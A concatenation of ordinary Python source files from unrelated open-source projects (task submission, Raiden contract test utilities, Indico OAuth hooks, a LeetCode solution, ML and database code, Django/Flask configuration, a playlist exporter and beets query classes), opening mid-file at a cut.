self.__submit(launcher_param)
def __create_input(self, main_root):
content = self.__manager.load_content()
input_dir = os.path.join(main_root,'input')
try:
content.get(self.__task.data['id'], 'input', os.path.join(main_root, 'input'))
except:
safe_mkdir(input_dir)
def __create_context(self, main_root):
context_dir = os.path.join(main_root, 'context')
safe_mkdir(context_dir)
action_default = {}
for unit, param in self.__task.data['workflow'].items():
action_default[unit] = self.__action_mgr.default_config(param['type'])
navigators = self.__config_mgr.navigator()
context_format = self.__navigator_mgr.context_format(navigators)
self.__context_mgr.create_context_file(self.__task.data, action_default, context_format, context_dir)
def __create_action(self, main_root):
action_dir = os.path.join(main_root, 'action')
safe_mkdir(action_dir)
actions = set()
for unit, param in self.__task.data['workflow'].items():
actions.add(param['type'])
self.__action_mgr.create_actions(actions, action_dir)
def __create_navigator(self, main_root):
navigator_dir = os.path.join(main_root, 'navigator')
safe_mkdir(navigator_dir)
navigators = self.__config_mgr.navigator()
self.__navigator_mgr.create_navigators(navigators, navigator_dir)
def __create_bootstrap(self, main_root):
bootstrap_dir = os.path.join(main_root, 'bootstrap')
safe_mkdir(bootstrap_dir)
bootstrap = self.__config_mgr.bootstrap()
self.__bootstrap_mgr.create_bootstrap(bootstrap, bootstrap_dir)
def __create_launcher(self, run_root):
launcher = self.__task.data['backend']['launcher']
return self.__launcher_mgr.create_launcher(launcher, run_root)
def __submit(self, launcher_param):
if self.__dry_run:
return
if self.__resubmit==False:
if self.__task.data.get('backend_job_ids') or self.__task.data.get('backend_task_id'):
self.__logger.info('This task has already been submitted to backend, rerun the command with "-r" option if you wish to delete current jobs and resubmit the task.')
return
else:
self.__logger.info('Removing submitted jobs on backend before resubmission.')
task_id = self.__task.data.get('backend_task_id')
#remove previously generated files in job folder
job_ids = self.__task.data.get('backend_job_ids')
run_root = self.__backend_mgr.get_run_root(self.__task.data['backend'], self.__task.data['id'])
job_root=os.path.join(run_root,'subjobs')
safe_rmdir(job_root)
if task_id:
self.__backend_mgr.delete_task(self.__task.data['backend'],backend_task_id = task_id)
elif job_ids:
self.__backend_mgr.delete_jobs(self.__task.data['backend'],backend_job_ids = job_ids)
result = self.__backend_mgr.submit(self.__task.data['backend'], self.__task.data['id'], launcher_param, sub_ids = self.__sub_ids)
if not type(result) is dict:
result = {}
if 'backend_job_ids' in result:
njobs = len(result['backend_job_ids'])
else:
njobs = len(result)
if njobs>0:
self.__logger.info('%d jobs successfully submitted to backend.'%(njobs))
self.__task.data.setdefault('backend_job_ids',{})
backend_job_ids=result.get('backend_job_ids',{})
backend_task_id=result.get('backend_task_id',0)
self.__task.data['backend_job_ids'].update(backend_job_ids)
self.__task.data['backend_task_id']=backend_task_id
self.__task.data['status'] = 'Submitted'
task_pool = self.__manager.load_task_pool()
task_pool.save(self.__task)
self.__logger.debug(result)
|
hackaugusto/raiden
|
raiden/tests/utils/smartcontracts.py
|
import os
from typing import List, Tuple
from raiden.network.blockchain_service import BlockChainService
from raiden.network.pathfinding import get_random_service
from raiden.network.proxies.service_registry import ServiceRegistry
from raiden.network.rpc.client import JSONRPCClient
from raiden.network.rpc.smartcontract_proxy import ContractProxy
from raiden.utils import typing
from raiden.utils.smart_contracts import deploy_contract_web3
from raiden.utils.solc import compile_files_cwd
from raiden_contracts.constants import CONTRACT_HUMAN_STANDARD_TOKEN
from raiden_contracts.contract_manager import ContractManager
def deploy_token(
deploy_client: JSONRPCClient,
contract_manager: ContractManager,
initial_amount: typing.TokenAmount,
decimals: int,
token_name: str,
token_symbol: str,
) -> ContractProxy:
token_address = deploy_contract_web3(
contract_name=CONTRACT_HUMAN_STANDARD_TOKEN,
deploy_client=deploy_client,
contract_manager=contract_manager,
constructor_arguments=(initial_amount, decimals, token_name, token_symbol),
)
contract_abi = contract_manager.get_contract_abi(CONTRACT_HUMAN_STANDARD_TOKEN)
return deploy_client.new_contract_proxy(
contract_interface=contract_abi, contract_address=token_address
)
def deploy_tokens_and_fund_accounts(
token_amount: int,
number_of_tokens: int,
deploy_service: BlockChainService,
participants: typing.List[typing.Address],
contract_manager: ContractManager,
) -> typing.List[typing.TokenAddress]:
""" Deploy `number_of_tokens` ERC20 token instances with `token_amount` minted and
distributed among `blockchain_services`. Optionally the instances will be registered with
the raiden registry.
Args:
token_amount (int): number of units that will be created per token
number_of_tokens (int): number of token instances that will be created
deploy_service (BlockChainService): the blockchain connection that will deploy
participants (list(address)): participant addresses that will receive tokens
"""
result = list()
for _ in range(number_of_tokens):
token_address = deploy_contract_web3(
CONTRACT_HUMAN_STANDARD_TOKEN,
deploy_service.client,
contract_manager=contract_manager,
constructor_arguments=(token_amount, 2, "raiden", "Rd"),
)
result.append(token_address)
# only the creator of the token starts with a balance (deploy_service),
# transfer from the creator to the other nodes
for transfer_to in participants:
deploy_service.token(token_address).transfer(
to_address=transfer_to, amount=token_amount // len(participants)
)
return result
def deploy_service_registry_and_set_urls(
private_keys, web3, contract_manager, service_registry_address
) -> Tuple[ServiceRegistry, List[str]]:
urls = ["http://foo", "http://boo", "http://coo"]
c1_client = JSONRPCClient(web3, private_keys[0])
c1_service_proxy = ServiceRegistry(
jsonrpc_client=c1_client,
service_registry_address=service_registry_address,
contract_manager=contract_manager,
)
c2_client = JSONRPCClient(web3, private_keys[1])
c2_service_proxy = ServiceRegistry(
jsonrpc_client=c2_client,
service_registry_address=service_registry_address,
contract_manager=contract_manager,
)
c3_client = JSONRPCClient(web3, private_keys[2])
c3_service_proxy = ServiceRegistry(
jsonrpc_client=c3_client,
service_registry_address=service_registry_address,
contract_manager=contract_manager,
)
# Test that getting a random service for an empty registry returns None
pfs_address = get_random_service(c1_service_proxy, "latest")
assert pfs_address is None
# Test that setting the urls works
c1_service_proxy.set_url(urls[0])
c2_service_proxy.set_url(urls[1])
c3_service_proxy.set_url(urls[2])
return c1_service_proxy, urls
def get_test_contract(name):
contract_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "..", "smart_contracts", name)
)
contracts = compile_files_cwd([contract_path])
return contract_path, contracts
def deploy_rpc_test_contract(deploy_client, name):
contract_path, contracts = get_test_contract(f"{name}.sol")
contract_proxy, _ = deploy_client.deploy_solidity_contract(
name, contracts, libraries=dict(), constructor_parameters=None, contract_path=contract_path
)
return contract_proxy
def get_list_of_block_numbers(item):
""" Creates a list of block numbers of the given list/single event"""
if isinstance(item, list):
return [element["blockNumber"] for element in item]
if isinstance(item, dict):
block_number = item["blockNumber"]
return [block_number]
return list()
|
indico/indico
|
indico/core/oauth/__init__.py
|
# This file is part of Indico.
# Copyright (C) 2002 - 2022 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
import os
from indico.core import signals
from indico.core.db import db
from .logger import logger
from .oauth2 import require_oauth
__all__ = ['require_oauth']
@signals.core.app_created.connect
def _no_ssl_required_on_debug(app, **kwargs):
if app.debug or app.testing:
os.environ['AUTHLIB_INSECURE_TRANSPORT'] = '1'
@signals.users.merged.connect
def _delete_merged_user_tokens(target, source, **kwargs):
target_app_links = {link.application: link for link in target.oauth_app_links}
for source_link in source.oauth_app_links.all():
try:
target_link = target_app_links[source_link.application]
except KeyError:
logger.info('merge: reassigning %r to %r', source_link, target)
source_link.user = target
else:
logger.info('merge: merging %r into %r', source_link, target_link)
target_link.update_scopes(set(source_link.scopes))
target_link.tokens.extend(source_link.tokens)
db.session.delete(source_link)
|
daicang/Leetcode-solutions
|
382-linked-list-random-node.py
|
import random
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
_largesize = 300
def __init__(self, head):
self.head = head
self.lsize = 0
while head.next:
head = head.next
self.lsize += 1
self.m1_idx = None
self.m2_idx = None
if self.lsize > self._largesize:
self.m1_idx = self.lsize / 3 # start from 1/3
self.m1 = self._getN(self.m1_idx)
self.m2_idx = self.m1_idx * 2 # start from 2/3
self.m2 = self._getN(self.m2_idx)
def _getN(self, n):
n -= 1
p = self.head
while n:
p = p.next
n -= 1
return p
def getRandom(self):
def _get(delta, start):
p = start
while delta:
p = p.next
delta -= 1
return p.val
nextpos = random.randint(0, self.lsize)
if not self.m1_idx:
return _get(nextpos, self.head)
if nextpos < self.m1_idx:
val = _get(nextpos, self.head)
elif nextpos < self.m2_idx:
val = _get(nextpos - self.m1_idx, self.m1)
else:
val = _get(nextpos - self.m2_idx, self.m2)
return val
|
tainstr/misura.canon
|
misura/canon/option/tests/test_sqlstore.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import os
from misura.canon import option
from misura.canon.option import get_typed_cols, get_insert_cmd, base_col_def, print_tree
import sqlite3
from misura.canon.tests import testdir
db = testdir + 'storage/tmpdb'
c1 = testdir + 'storage/Conf.csv'
def go(t):
o = option.Option(**{'handle': t, 'type': t})
o.validate()
return o
class SqlStore(unittest.TestCase):
@classmethod
def setUpClass(cls):
if os.path.exists(db):
os.remove(db)
cls.conn = sqlite3.connect(db, detect_types=sqlite3.PARSE_DECLTYPES)
st0 = option.CsvStore(kid='/base/')
st0.merge_file(c1)
st0.validate()
cls.desc = st0.desc
def test_get_typed_cols(self):
print(get_typed_cols(go('Integer')))
print(get_typed_cols(go('String')))
print(get_typed_cols(go('Point')))
print(get_typed_cols(go('Role')))
print(get_typed_cols(go('RoleIO')))
print(get_typed_cols(go('Log')))
print(get_typed_cols(go('Meta')))
def test_get_insert_cmd(self):
print(get_insert_cmd(go('Integer'), base_col_def))
print(get_insert_cmd(go('String'), base_col_def))
print(get_insert_cmd(go('Point'), base_col_def))
print(get_insert_cmd(go('Role'), base_col_def))
print(get_insert_cmd(go('RoleIO'), base_col_def))
print(get_insert_cmd(go('Log'), base_col_def))
print(get_insert_cmd(go('Meta'), base_col_def))
def test_column_definition(self):
s = option.SqlStore()
print(s.column_definition(go('Integer'))[1])
print(s.column_definition(go('String'))[1])
print(s.column_definition(go('Point'))[1])
print(s.column_definition(go('Role'))[1])
print(s.column_definition(go('RoleIO'))[1])
print(s.column_definition(go('Log'))[1])
print(s.column_definition(go('Meta'))[1])
def test_write_desc(self):
s = option.SqlStore()
s.cursor = self.conn.cursor()
s.write_desc(self.desc)
print('READING')
r = s.read_tree()
print(r)
print('print(tree\n', print_tree(r))
print('WRITING AGAIN')
s.write_tree(r)
print("READING AGAIN")
r = s.read_tree()
print(r)
print('print(tree2\n', print_tree(r))
# @unittest.skip('')
def test_tables(self):
st0 = option.CsvStore(kid='ciao')
st0.merge_file(c1)
st = option.SqlStore(kid='ciao')
st.desc = st0.desc
k0 = set(st.desc.keys())
cursor = self.conn.cursor()
st.write_table(cursor, 'conf1')
self.conn.commit()
cursor.execute('select handle from conf1')
r = cursor.fetchall()
k1 = set([eval(k[0]) for k in r])
self.assertEqual(k0, k1)
st2 = option.SqlStore(kid='ciao')
st2.read_table(cursor, 'conf1')
self.assertEqual(st.desc, st2.desc)
if __name__ == "__main__":
unittest.main()
|
NiloFreitas/Deep-Reinforcement-Learning
|
reinforcement/players/player_reinforce_rnn_2.py
|
from players.player import player
from auxiliar.aux_plot import *
import random
from collections import deque
import sys
sys.path.append('..')
import tensorblock as tb
import numpy as np
import tensorflow as tf
# PLAYER REINFORCE RNN
class player_reinforce_rnn_2(player):
# __INIT__
def __init__(self):
player.__init__(self)
self.experiences = deque()
# CHOOSE NEXT ACTION
def act(self, state):
return self.calculate(state)
# CALCULATE NETWORK
def calculate(self, state):
size = len( self.experiences )
if size < self.NUM_FRAMES:
return self.create_random_action()
states = np.zeros( (self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
for i , j in enumerate( range( size - self.NUM_FRAMES , size ) ):
states[i] = self.experiences[j][1]
states = np.expand_dims( states, 0 )
output = np.squeeze( self.brain.run('Output', [['Observation', states]]) )
action = np.random.choice( np.arange(len(output)), p=output )
return self.create_action(action)
# PREPARE NETWORK
def operations(self):
# Action Placeholders
self.brain.addInput( shape = [ None , self.num_actions ] , name = 'Actions' )
self.brain.addInput( shape = [ None ] , name = 'Target' )
# Operations
self.brain.addOperation( function = tb.ops.pgcost,
input = [ 'Output', 'Actions', 'Target' ],
name = 'Cost' )
# Optimizer
self.brain.addOperation( function = tb.optims.adam,
input = 'Cost',
learning_rate = self.LEARNING_RATE,
name = 'Optimizer' )
# TensorBoard
self.brain.addSummaryScalar( input = 'Cost' )
self.brain.addSummaryHistogram( input = 'Target' )
self.brain.addWriter( name = 'Writer' , dir = './' )
self.brain.addSummary( name = 'Summary' )
self.brain.initialize()
# TRAIN NETWORK
def train(self, prev_state, curr_state, actn, rewd, done, episode):
# Store New Experience Until Done
self.experiences.append((prev_state, curr_state, actn, rewd, done))
batchsize = len( self.experiences ) - self.NUM_FRAMES + 1
# Check for Train
if done:
# Select Batch
batch = self.experiences
# Separate Batch Data
prev_states = np.zeros( ( batchsize , self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
curr_states = np.zeros( ( batchsize , self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
actions = np.zeros( ( batchsize , self.num_actions ) )
rewards = np.zeros( ( batchsize ) )
dones = np.zeros( ( batchsize ) )
# Select Batches
for i in range( 0 , batchsize ):
for j in range( 0 , self.NUM_FRAMES ):
prev_states[i,j,:,:] = self.experiences[ i + j ][0]
curr_states[i,j,:,:] = self.experiences[ i + j ][1]
actions[i] = self.experiences[ i + self.NUM_FRAMES - 1][2]
rewards[i] = self.experiences[ i + self.NUM_FRAMES - 1][3]
dones[i] = self.experiences[ i + self.NUM_FRAMES - 1][4]
# Calculate Discounted Reward
running_add = 0
discounted_r = np.zeros_like(rewards)
for t in reversed(range(0, len(rewards))):
if rewards[t] != 0: # pygame_catch specific
running_add = 0
running_add = running_add * self.REWARD_DISCOUNT + rewards[t]
discounted_r[t] = running_add
# Optimize Neural Network
_, summary = self.brain.run( ['Optimizer','Summary'], [ ['Observation', prev_states ],
['Actions', actions ],
['Target', discounted_r ] ] )
# TensorBoard
self.brain.write( summary = summary, iter = episode )
# Reset Batch
self.experiences = deque()
|
dmccloskey/SBaaS_rnasequencing
|
SBaaS_rnasequencing/stage01_rnasequencing_analysis_postgresql_models.py
|
from SBaaS_base.postgresql_orm_base import *
class data_stage01_rnasequencing_analysis(Base):
__tablename__ = 'data_stage01_rnasequencing_analysis'
id = Column(Integer, Sequence('data_stage01_rnasequencing_analysis_id_seq'), primary_key=True)
analysis_id = Column(String(500))
experiment_id = Column(String(50))
sample_name_abbreviation = Column(String(500)) # equivalent to sample_name_abbreviation
sample_name = Column(String(500)) # equivalent to sample_name_abbreviation
time_point = Column(String(10)) # converted to intermediate in lineage analysis
analysis_type = Column(String(100)); # time-course (i.e., multiple time points), paired (i.e., control compared to multiple replicates), group (i.e., single grouping of samples).
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
UniqueConstraint('experiment_id','sample_name_abbreviation','sample_name','time_point','analysis_type','analysis_id'),
)
def __init__(self,
row_dict_I,
):
self.analysis_id=row_dict_I['analysis_id'];
self.experiment_id=row_dict_I['experiment_id'];
self.sample_name_abbreviation=row_dict_I['sample_name_abbreviation'];
self.sample_name=row_dict_I['sample_name'];
self.time_point=row_dict_I['time_point'];
self.analysis_type=row_dict_I['analysis_type'];
self.used_=row_dict_I['used_'];
self.comment_=row_dict_I['comment_'];
def __set__row__(self,analysis_id_I,
experiment_id_I,
sample_name_abbreviation_I,
sample_name_I,
time_point_I,
analysis_type_I,
used__I,
comment__I):
self.analysis_id=analysis_id_I
self.experiment_id=experiment_id_I
self.sample_name_abbreviation=sample_name_abbreviation_I
self.sample_name=sample_name_I
self.time_point=time_point_I
self.analysis_type=analysis_type_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'analysis_id':self.analysis_id,
'experiment_id':self.experiment_id,
'sample_name_abbreviation':self.sample_name_abbreviation,
'sample_name':self.sample_name,
'time_point':self.time_point,
'analysis_type':self.analysis_type,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
|
endarthur/autti
|
auttitude/math.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name
from __future__ import absolute_import
from math import acos, cos, pi, radians, sin, sqrt
import auttitude as at
import numpy as np
def normalized_cross(a, b):
"""
Returns the normalized cross product between vectors.
Uses numpy.cross().
Parameters:
a: First vector.
b: Second vector.
"""
c = np.cross(a, b)
length = sqrt(c.dot(c))
return c/length if length > 0 else c
def general_plane_intersection(n_a, da, n_b, db):
"""
Returns a point and direction vector for the line of intersection
of two planes in space, or None if planes are parallel.
Parameters:
n_a: Normal vector to plane A
da: Point of plane A
n_b: Normal vector to plane B
db: Point of plane B
"""
# https://en.wikipedia.org/wiki/Intersection_curve
n_a = np.array(n_a)
n_b = np.array(n_b)
da = np.array(da)
db = np.array(db)
l_v = np.cross(n_a, n_b)
norm_l = sqrt(np.dot(l_v, l_v))
if norm_l == 0:
return None
else:
l_v /= norm_l
aa = np.dot(n_a, n_a)
bb = np.dot(n_b, n_b)
ab = np.dot(n_a, n_b)
d_ = 1./(aa*bb - ab*ab)
l_0 = (da*bb - db*ab)*d_*n_a + (db*aa - da*ab)*d_*n_b
return l_v, l_0
def small_circle_intersection(axis_a, angle_a, axis_b, angle_b):
"""
Finds the intersection between two small-circles returning zero, one or two
solutions as tuple.
Parameters:
axis_a: Vector defining first circle axis
angle_a: Small circle aperture angle (in radians) around axis_a
axis_b: Vector defining second circle axis
angle_b: Small circle aperture angle (in radians) around axis_b
"""
line = general_plane_intersection(axis_a, cos(angle_a),
axis_b, cos(angle_b))
if line is None:
return ()
l_v, l_0 = line
# https://en.wikipedia.org/wiki/Line%E2%80%93sphere_intersection
b = 2*l_v.dot(l_0)
delta = b*b - 4*(l_0.dot(l_0) - 1)
# Should the answers be normalized?
if delta < 0:
return ()
elif delta == 0:
return -b/2.,
else:
sqrt_delta = sqrt(delta)
return l_0 + l_v*(-b - sqrt_delta)/2., l_0 + l_v*(-b + sqrt_delta)/2.
def build_rotation_matrix(azim, plng, rake):
"""
Returns the rotation matrix that rotates the North vector to the line given
by Azimuth and Plunge and East and Up vectors are rotate clock-wise by Rake
around the rotated North vector.
Parameters:
azim: Line Azimuth from North (degrees).
plng: Line Plunge measured from horizontal (degrees).
rake: Rotation angle around rotated axis (degrees).
"""
# pylint: disable=bad-whitespace
azim, plng, rake = radians(azim), radians(plng), radians(rake)
R1 = np.array((( cos(rake), 0., sin(rake)),
( 0., 1., 0. ),
(-sin(rake), 0., cos(rake))))
R2 = np.array((( 1., 0., 0. ),
( 0., cos(plng), sin(plng)),
( 0., -sin(plng), cos(plng))))
R3 = np.array((( cos(azim), sin(azim), 0. ),
(-sin(azim), cos(azim), 0. ),
( 0., 0., 1. )))
return R3.dot(R2).dot(R1)
def adjust_lines_to_planes(lines, planes):
"""
Project each given line to it's respective plane. Returns the projected
lines as a new LineSet and the angle (in radians) between each line and
plane prior to projection.
Parameters:
lines: A LineSet like object with an array of n Lines
planes: A PlaseSet like object with an array of n Planes
"""
lines = at.LineSet(lines)
planes = at.PlaneSet(planes)
angles = np.zeros(len(lines))
adjusted_lines = np.zeros_like(lines)
for i, (line, plane) in enumerate(zip(lines, planes)):
cos_theta = np.dot(line, plane)
angles[i] = pi/2. - acos(cos_theta)
adjusted_line = line - line*cos_theta
adjusted_lines[i] = adjusted_line/sqrt(np.dot(adjusted_line,
adjusted_line))
return adjusted_lines, angles
|
ADKosm/Recipes
|
Recipes/rcps/admin.py
|
from django.contrib import admin
# Register your models here.
from rcps.models import *
class IngredientToRecipeInline(admin.TabularInline):
model = Ingredient.recipes.through
verbose_name = 'Ингредиент'
verbose_name_plural = 'Ингредиенты'
class EquipmentInline(admin.TabularInline):
model = Equipment.equipment_recipes.through
verbose_name = 'Инструмент'
verbose_name_plural = 'Инструменты'
class TagInline(admin.TabularInline):
model = Tag.tag_recipes.through
verbose_name = 'Тег'
verbose_name_plural = 'Теги'
class RecipeAdmin(admin.ModelAdmin):
model = Recipe
fields = ['recipe_name', 'recipe_link']
inlines = (
IngredientToRecipeInline,
EquipmentInline,
TagInline,
)
class IngredientComponentInAlternativeInline(admin.TabularInline):
model = IngredientAlternative.ingredients.through
verbose_name = 'Ингредиент'
verbose_name_plural = 'Ингредиенты'
class IngredientAlternativeAdmin(admin.ModelAdmin):
model = IngredientAlternative
inlines = (
IngredientComponentInAlternativeInline,
)
admin.site.register(Recipe, RecipeAdmin)
admin.site.register(Ingredient)
admin.site.register(IngredientAlternative, IngredientAlternativeAdmin)
admin.site.register(IngredientCategory)
admin.site.register(Equipment)
admin.site.register(EquipmentCategory)
admin.site.register(IngredientReplacement)
admin.site.register(Tag)
|
jiangtyd/crewviewer
|
project/config.py
|
import os
class Config(object):
DEBUG = False
TESTING = False
CSRF_ENABLED = True
SECRET_KEY = "super_secret_key"
SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']
class ProductionConfig(Config):
DEBUG = False
SECRET_KEY = os.environ['SECRET_KEY']
class DevelopmentConfig(Config):
DEVELOPMENT = True
DEBUG = True
class TestingConfig(Config):
TESTING = True
|
geographika/mappyfile
|
docs/scripts/class_diagrams.py
|
r"""
Create MapServer class diagrams
Requires https://graphviz.gitlab.io/_pages/Download/Download_windows.html
https://stackoverflow.com/questions/1494492/graphviz-how-to-go-from-dot-to-a-graph
For DOT languge see http://www.graphviz.org/doc/info/attrs.html
cd C:\Program Files (x86)\Graphviz2.38\bin
dot -Tpng D:\GitHub\mappyfile\mapfile_classes.dot -o outfile.png
outfile.png
For Entity Relationship diagrams:
https://graphviz.readthedocs.io/en/stable/examples.html#er-py
"""
import os
import pydot
# import pprint
FONT = "Lucida Sans"
def graphviz_setup(gviz_path):
os.environ['PATH'] = gviz_path + ";" + os.environ['PATH']
def add_child(graph, child_id, child_label, parent_id, colour):
"""
http://www.graphviz.org/doc/info/shapes.html#polygon
"""
node = pydot.Node(child_id, style="filled", fillcolor=colour, label=child_label, shape="polygon", fontname=FONT)
graph.add_node(node)
graph.add_edge(pydot.Edge(parent_id, node))
def add_children(graph, parent_id, d, level=0):
blue = "#6b6bd1"
white = "#fdfefd"
green = "#33a333"
colours = [blue, white, green] * 3
for class_, children in d.items():
colour = colours[level]
child_label = class_
child_id = parent_id + "_" + class_
add_child(graph, child_id, child_label, parent_id, colour)
add_children(graph, child_id, children, level+1)
def save_file(graph, fn):
filename = "%s.png" % fn
graph.write_png(filename)
graph.write("%s.dot" % fn)
os.startfile(filename)
def main(gviz_path, layer_only=False):
graphviz_setup(gviz_path)
graph = pydot.Dot(graph_type='digraph', rankdir="TB")
layer_children = {
'CLASS': {
'LABEL': {'STYLE': {}},
'CONNECTIONOPTIONS': {},
'LEADER': {'STYLE': {}},
'STYLE': {},
'VALIDATION': {}
},
'CLUSTER': {},
'COMPOSITE': {},
'FEATURE': {'POINTS': {}},
'GRID': {},
'JOIN': {},
'METADATA': {},
'PROJECTION': {},
'SCALETOKEN': {'VALUES': {}},
'VALIDATION': {}
}
# pprint.pprint(layer_children)
classes = {
"MAP": {
"LAYER": layer_children,
'LEGEND': {'LABEL': {}},
'PROJECTION': {},
'QUERYMAP': {},
'REFERENCE': {},
'SCALEBAR': {'LABEL': {}},
'SYMBOL': {},
'WEB': {'METADATA': {}, 'VALIDATION': {}}
}
}
if layer_only:
root = "LAYER"
classes = classes["MAP"]
fn = "layer_classes"
else:
fn = "map_classes"
root, = classes.keys()
node = pydot.Node(root, style="filled", fillcolor="#33a333", label=root, fontname=FONT, shape="polygon")
graph.add_node(node)
add_children(graph, root, classes[root])
save_file(graph, fn)
if __name__ == "__main__":
gviz_path = r"C:\Program Files (x86)\Graphviz2.38\bin"
main(gviz_path, True)
main(gviz_path, False)
print("Done!")
|
soulfx/gmusic-playlist
|
ExportLists.py
|
# Author: John Elkins <john.elkins@yahoo.com>
# License: MIT <LICENSE>
from common import *
if len(sys.argv) < 2:
log('ERROR output directory is required')
time.sleep(3)
exit()
# setup the output directory, create it if needed
output_dir = sys.argv[1]
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# log in and load personal library
api = open_api()
library = load_personal_library()
def playlist_handler(playlist_name, playlist_description, playlist_tracks):
# skip empty and no-name playlists
if not playlist_name: return
if len(playlist_tracks) == 0: return
# setup output files
playlist_name = playlist_name.replace('/', '')
open_log(os.path.join(output_dir,playlist_name+u'.log'))
outfile = codecs.open(os.path.join(output_dir,playlist_name+u'.csv'),
encoding='utf-8',mode='w')
# keep track of stats
stats = create_stats()
export_skipped = 0
# keep track of songids incase we need to skip duplicates
song_ids = []
log('')
log('============================================================')
log(u'Exporting '+ unicode(len(playlist_tracks)) +u' tracks from '
+playlist_name)
log('============================================================')
# add the playlist description as a "comment"
if playlist_description:
outfile.write(tsep)
outfile.write(playlist_description)
outfile.write(os.linesep)
for tnum, pl_track in enumerate(playlist_tracks):
track = pl_track.get('track')
# we need to look up these track in the library
if not track:
library_track = [
item for item in library if item.get('id')
in pl_track.get('trackId')]
if len(library_track) == 0:
log(u'!! '+str(tnum+1)+repr(pl_track))
export_skipped += 1
continue
track = library_track[0]
result_details = create_result_details(track)
if not allow_duplicates and result_details['songid'] in song_ids:
log('{D} '+str(tnum+1)+'. '+create_details_string(result_details,True))
export_skipped += 1
continue
# update the stats
update_stats(track,stats)
# export the track
song_ids.append(result_details['songid'])
outfile.write(create_details_string(result_details))
outfile.write(os.linesep)
# calculate the stats
stats_results = calculate_stats_results(stats,len(playlist_tracks))
# output the stats to the log
log('')
log_stats(stats_results)
log(u'export skipped: '+unicode(export_skipped))
# close the files
close_log()
outfile.close()
# the personal library is used so we can lookup tracks that fail to return
# info from the ...playlist_contents() call
playlist_contents = api.get_all_user_playlist_contents()
for playlist in playlist_contents:
playlist_name = playlist.get('name')
playlist_description = playlist.get('description')
playlist_tracks = playlist.get('tracks')
playlist_handler(playlist_name, playlist_description, playlist_tracks)
if export_thumbs_up:
# get thumbs up playlist
thumbs_up_tracks = []
for track in library:
if track.get('rating') is not None and int(track.get('rating')) > 1:
thumbs_up_tracks.append(track)
# modify format of each dictionary to match the data type
# of the other playlists
thumbs_up_tracks_formatted = []
for t in thumbs_up_tracks:
thumbs_up_tracks_formatted.append({'track': t})
playlist_handler('Thumbs up', 'Thumbs up tracks', thumbs_up_tracks_formatted)
if export_all:
all_tracks_formatted = []
for t in library:
all_tracks_formatted.append({'track': t})
playlist_handler('All', 'All tracks', all_tracks_formatted)
close_api()
|
nkoech/csacompendium
|
csacompendium/csa_practice/api/practicelevel/practicelevelviews.py
|
from csacompendium.csa_practice.models import PracticeLevel
from csacompendium.utils.pagination import APILimitOffsetPagination
from csacompendium.utils.permissions import IsOwnerOrReadOnly
from csacompendium.utils.viewsutils import DetailViewUpdateDelete, CreateAPIViewHook
from rest_framework.filters import DjangoFilterBackend
from rest_framework.generics import CreateAPIView, ListAPIView
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from .filters import PracticeLevelListFilter
from csacompendium.csa_practice.api.practicelevel.practicelevelserializers import practice_level_serializers
def practice_level_views():
"""
Practice level views
:return: All practice level views
:rtype: Object
"""
practice_level_serializer = practice_level_serializers()
class PracticeLevelCreateAPIView(CreateAPIViewHook):
"""
Creates a single record.
"""
queryset = PracticeLevel.objects.all()
serializer_class = practice_level_serializer['PracticeLevelDetailSerializer']
permission_classes = [IsAuthenticated]
class PracticeLevelListAPIView(ListAPIView):
"""
API list view. Gets all records API.
"""
queryset = PracticeLevel.objects.all()
serializer_class = practice_level_serializer['PracticeLevelListSerializer']
filter_backends = (DjangoFilterBackend,)
filter_class = PracticeLevelListFilter
pagination_class = APILimitOffsetPagination
class PracticeLevelDetailAPIView(DetailViewUpdateDelete):
"""
Updates a record.
"""
queryset = PracticeLevel.objects.all()
serializer_class = practice_level_serializer['PracticeLevelDetailSerializer']
permission_classes = [IsAuthenticated, IsAdminUser]
lookup_field = 'slug'
return {
'PracticeLevelListAPIView': PracticeLevelListAPIView,
'PracticeLevelDetailAPIView': PracticeLevelDetailAPIView,
'PracticeLevelCreateAPIView': PracticeLevelCreateAPIView
}
|
beetbox/beets
|
beets/dbcore/query.py
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""The Query type hierarchy for DBCore.
"""
import re
from operator import mul
from beets import util
from datetime import datetime, timedelta
import unicodedata
from functools import reduce
class ParsingError(ValueError):
"""Abstract class for any unparseable user-requested album/query
specification.
"""
class InvalidQueryError(ParsingError):
"""Represent any kind of invalid query.
The query should be a unicode string or a list, which will be space-joined.
"""
def __init__(self, query, explanation):
if isinstance(query, list):
query = " ".join(query)
message = f"'{query}': {explanation}"
super().__init__(message)
class InvalidQueryArgumentValueError(ParsingError):
"""Represent a query argument that could not be converted as expected.
It exists to be caught in upper stack levels so a meaningful (i.e. with the
query) InvalidQueryError can be raised.
"""
def __init__(self, what, expected, detail=None):
message = f"'{what}' is not {expected}"
if detail:
message = f"{message}: {detail}"
super().__init__(message)
class Query:
"""An abstract class representing a query into the item database.
"""
def clause(self):
"""Generate an SQLite expression implementing the query.
Return (clause, subvals) where clause is a valid sqlite
WHERE clause implementing the query and subvals is a list of
items to be substituted for ?s in the clause.
"""
return None, ()
def match(self, item):
"""Check whether this query matches a given Item. Can be used to
perform queries on arbitrary sets of Items.
"""
raise NotImplementedError
def __repr__(self):
return f"{self.__class__.__name__}()"
